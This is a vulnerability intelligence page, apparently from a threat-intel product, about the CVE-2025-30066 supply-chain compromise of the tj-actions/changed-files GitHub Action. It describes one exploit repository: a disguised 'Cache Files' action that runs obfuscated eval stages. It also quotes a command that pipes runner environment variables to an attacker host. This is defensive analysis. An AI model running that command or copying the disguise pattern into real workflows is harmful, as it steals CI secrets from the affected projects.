Embedded malicious code in tj-actions/changed-files
CVE-2025-30066 is a supply-chain compromise affecting the GitHub Action tj-actions/changed-files. According to the provided content, tags v1 through v45.0.7 were maliciously modified on 2025-03-14 and 2025-03-15 to point to attacker-controlled commit 0e58ed8, which contained malicious updateFeatures code. The injected code caused secrets available to GitHub Actions workflows to be exposed via workflow logs, allowing remote attackers to recover sensitive values by reading those logs. Supporting reporting in the provided content also describes the issue as embedded malicious code in the action and notes that the compromise may have been enabled by a compromised GitHub Personal Access Token and, potentially, a cascading compromise involving reviewdog/action-setup@v1. Affected repositories were those invoking compromised tags rather than immutable commit SHAs.
Are you exposed to this one?
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
Impact, mitigation & remediation
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
Impact
What an attacker gets, and what they’ve been doing with it.
Mitigation
If you can’t patch tonight, do this now.
Remediation
Patch, then assume compromise.
Exploits
1 valid exploit after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
This repository is a small malicious GitHub Action disguised as a benign cache utility. It contains three files: a minimal README describing it as a simulated compromised action for security research, an action.yml manifest defining a Node 20 GitHub Action named 'Cache Files', and dist/index.js containing the actual logic. The JavaScript implements a lightweight mock of @actions/core helpers, accepts path and key inputs, and performs plausible cache-related output generation to appear legitimate. However, before the normal run() logic, it executes two obfuscated payload stages using eval: one from a hex-decoded string and another from a base64-decoded string. The second stage imports child_process.execSync and runs 'printenv | curl -X POST -d @- https://attacker.example.com/envs', which exfiltrates all runner environment variables to an attacker-controlled endpoint. This is a supply-chain style CI/CD compromise pattern consistent with the README's stated simulation of CVE-2025-30066-style malicious GitHub Actions behavior. The exploit capability is credential and secret theft from CI environments, not host takeover. The code is operational rather than a mere proof of concept because it includes a working hardcoded exfiltration command and preserves expected action behavior to evade detection.
Affected products & vendors
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
Recent activity
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A supply-chain vulnerability/incident involving tj-actions in which retroactive tag modification attacks could be used against CI/CD workflows; cited here as a reason to pin actions to immutable SHAs.
A supply-chain compromise affecting tj-actions/changed-files through a poisoned transitive GitHub Action dependency chain, resulting in malicious code execution on CI runners and secret theft from memory.
A vulnerability in the tj-actions/changed files GitHub Action that caused repositories to leak secrets, cited as another example of supply-chain compromise risk.
A vulnerability arising from the compromise of the GitHub Action tj-actions/changed-files, enabling malicious code injection and remote impact (e.g., secrets exposure).
The version that knows your environment.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.